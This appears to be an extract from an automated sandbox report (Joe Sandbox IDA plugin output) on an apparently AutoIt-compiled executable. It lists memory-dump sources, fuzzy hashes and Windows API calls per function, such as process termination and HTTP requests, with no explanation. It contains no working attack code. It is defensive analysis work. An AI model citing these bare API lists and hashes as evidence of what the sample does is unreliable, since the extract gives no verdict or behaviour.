                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                                                                                                      • Opcode ID: e49b22e6fb6f865a8ed767e9d8fed79c395f728310c80caf05e239cde914b0bb
                                                                                                                                                                                                                                                      • Instruction ID: 980ebff544b672fccc86b31dd47989ff33c2e9309cb39416baa0e144687892b3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e49b22e6fb6f865a8ed767e9d8fed79c395f728310c80caf05e239cde914b0bb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 360167B0902B5EBDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1423608774-0
                                                                                                                                                                                                                                                      • Opcode ID: 55851aeac2898515a78f0c06c15a92cc24ef2c23970707ba06c9ef7a22d4139e
                                                                                                                                                                                                                                                      • Instruction ID: 5d8b3697f9f9f8d73b1cfafb27af17a14e12d34957bbbd59c35651b3f443c038
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55851aeac2898515a78f0c06c15a92cc24ef2c23970707ba06c9ef7a22d4139e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C701A436706215ABE7252F58EC58DEB77A9FF99711B040529F903920E1EBF89900FB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F07C07
                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F07C1D
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00F07C2C
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F07C3B
                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F07C45
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F07C4C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 839392675-0
                                                                                                                                                                                                                                                      • Opcode ID: 7631a746e0c8362e1080530258d65389922c92cfc3e222d26525b58bc4622bb9
                                                                                                                                                                                                                                                      • Instruction ID: 3adf63f3b62508a19e8fb3fa7169fa442280bcd8629cd2712a636327b7051212
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7631a746e0c8362e1080530258d65389922c92cfc3e222d26525b58bc4622bb9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68F03A7A64215CBBE7215B529C0EEEF7B7CEFD7B11F000058FE0591091D7A06A81E6B5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00F09A33
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,00F35DEE,?,?,?,?,?,00ECED63), ref: 00F09A44
                                                                                                                                                                                                                                                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,00F35DEE,?,?,?,?,?,00ECED63), ref: 00F09A51
                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00F35DEE,?,?,?,?,?,00ECED63), ref: 00F09A5E
                                                                                                                                                                                                                                                        • Part of subcall function 00F093D1: CloseHandle.KERNEL32(?,?,00F09A6B,?,?,?,00F35DEE,?,?,?,?,?,00ECED63), ref: 00F093DB
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F09A71
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,00F35DEE,?,?,?,?,?,00ECED63), ref: 00F09A78
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3495660284-0
                                                                                                                                                                                                                                                      • Opcode ID: 7c56a7b10a10044838b03ec00031d78ebc1ceaa0b31724bc2421cf16bc2c1b39
                                                                                                                                                                                                                                                      • Instruction ID: c6652c4b1c17fb6c77aae5b71949e887adbd197b27b9312fff7896092263f958
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c56a7b10a10044838b03ec00031d78ebc1ceaa0b31724bc2421cf16bc2c1b39
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FF0E23A645209ABE3111FA4EC8CDEB7779FF96301B040021F903910E1DBF89A00FB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDF4EA: std::exception::exception.LIBCMT ref: 00EDF51E
                                                                                                                                                                                                                                                        • Part of subcall function 00EDF4EA: __CxxThrowException@8.LIBCMT ref: 00EDF533
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00EC1EA6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EC1D49
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                                                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                                                                      • API String ID: 2125237772-557222456
                                                                                                                                                                                                                                                      • Opcode ID: bcc22de6898b1e4d9cae20da2f0c9c0e09774c3f13402b6cc1ac7a1a9043c9e0
                                                                                                                                                                                                                                                      • Instruction ID: 5663d78b299e8341eedc2fed32ab93a9b78324749fa4fe03980248ad8e2a6188
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcc22de6898b1e4d9cae20da2f0c9c0e09774c3f13402b6cc1ac7a1a9043c9e0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB91DF715043019FC714EF24CA96E6EB7E4BF85710F04591EF945A72A2DB32ED06CB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00F1B006
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00F1B115
                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00F1B298
                                                                                                                                                                                                                                                        • Part of subcall function 00F09DC5: VariantInit.OLEAUT32(00000000), ref: 00F09E05
                                                                                                                                                                                                                                                        • Part of subcall function 00F09DC5: VariantCopy.OLEAUT32(?,?), ref: 00F09E0E
                                                                                                                                                                                                                                                        • Part of subcall function 00F09DC5: VariantClear.OLEAUT32(?), ref: 00F09E1A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                                                                                                                                                      • Opcode ID: ca39a5d000a6937fb2a2af1f559e8c4d2d2bc343384730806fe2fc4218313733
                                                                                                                                                                                                                                                      • Instruction ID: b0ce7f4afd46cdc438d94ffc152d4e5d89113343437c04239d2c240fe31f29d4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca39a5d000a6937fb2a2af1f559e8c4d2d2bc343384730806fe2fc4218313733
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C919C31608341DFCB10DF24C584E9ABBE4EF89710F14486EF89A9B362DB31E946DB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDC6F4: _wcscpy.LIBCMT ref: 00EDC717
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F05438
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?), ref: 00F05467
                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F05513
                                                                                                                                                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F0553D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 4152858687-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: e60473299e9b0efd8eaa56a0d6c998973a17192552d746102b814f97e05bfe1e
                                                                                                                                                                                                                                                      • Instruction ID: 13bac91a865a7a71b7f2c167ef44639ff64a46ff08818733c51946743fd83518
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e60473299e9b0efd8eaa56a0d6c998973a17192552d746102b814f97e05bfe1e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA512175A047018BD710DA28CC517BBB7E9AB45B28F080A2EF895D31D0DBE0CC45BF52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0027B
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F002B1
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F002C2
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F00344
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                      • String ID: DllGetClassObject
                                                                                                                                                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                      • Opcode ID: 4271b90073a4922d821b169202556c5110da0573aa1a524b44b3754a8c6c0815
                                                                                                                                                                                                                                                      • Instruction ID: 9ef1589512af029f7f6db86a20020869d95627fc1bc396df433e440416dc05a2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4271b90073a4922d821b169202556c5110da0573aa1a524b44b3754a8c6c0815
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6414D71A00204EFDB06CF54C885B9A7BB9EF45315F1480A9ED09DF286DBB5DA44FBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F05075
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32 ref: 00F05091
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00F050D7
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F81708,00000000), ref: 00F05120
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 02ddf6befc144f8e6a1b1d3d1db173e5e257a6c76572ae5dcc6b3be2dfe41dd8
                                                                                                                                                                                                                                                      • Instruction ID: 34d980f2e795afedc18f42212326430440e70c07e8b932d0362396b4bee35491
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02ddf6befc144f8e6a1b1d3d1db173e5e257a6c76572ae5dcc6b3be2dfe41dd8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C41AC712057019FD7209F24DC81B2BB7E8AF85B24F044A5EF965972D1D7B0A904EF62
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00F20587
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                      • API String ID: 2358735015-567219261
                                                                                                                                                                                                                                                      • Opcode ID: c2c0595b906831c1e381da40b06f985eb2687c434dee872265ea7dac13ec1069
                                                                                                                                                                                                                                                      • Instruction ID: 97cee265cbc2f5709b9e30cfa486f520e8377426a732c9f584095b4a85ad41b3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2c0595b906831c1e381da40b06f985eb2687c434dee872265ea7dac13ec1069
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F319031900216AFCF00EF54DD51AEEB7B4FF55314B10862AE826A77D2DB71A916DB80
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EFB88E
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EFB8A1
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EFB8D1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 3850602802-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: 6457dbadd825ade154076cbfd01025f224c42611153ee8f41f1ed2cada12d454
                                                                                                                                                                                                                                                      • Instruction ID: cd6a7562f0dcf5faeb39748432a7a04c46e0c4613a7d491c8c25a604033c83b4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6457dbadd825ade154076cbfd01025f224c42611153ee8f41f1ed2cada12d454
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16210475A00108AFD7089BA4C886DFE77B8DF86354B105129F525B61E1DB754D069620
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F14401
                                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F14427
                                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F14457
                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00F1449E
                                                                                                                                                                                                                                                        • Part of subcall function 00F15052: GetLastError.KERNEL32(?,?,00F143CC,00000000,00000000,00000001), ref: 00F15067
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1951874230-3916222277
                                                                                                                                                                                                                                                      • Opcode ID: ed1b72f5c33eacd91af820bff8c67b09f7abc79004ced6de6d585290c044228b
                                                                                                                                                                                                                                                      • Instruction ID: 5ebff10222224a516eddb067c95210fb43d2c7e71ebda55fdd95f8ea97d7814b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed1b72f5c33eacd91af820bff8c67b09f7abc79004ced6de6d585290c044228b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 932180B6500209BEE711DF95CC85FFB76ECEB89B58F10801AF905D2140DA64AD85A771
                                                                                                                                                                                                                                                      APIs
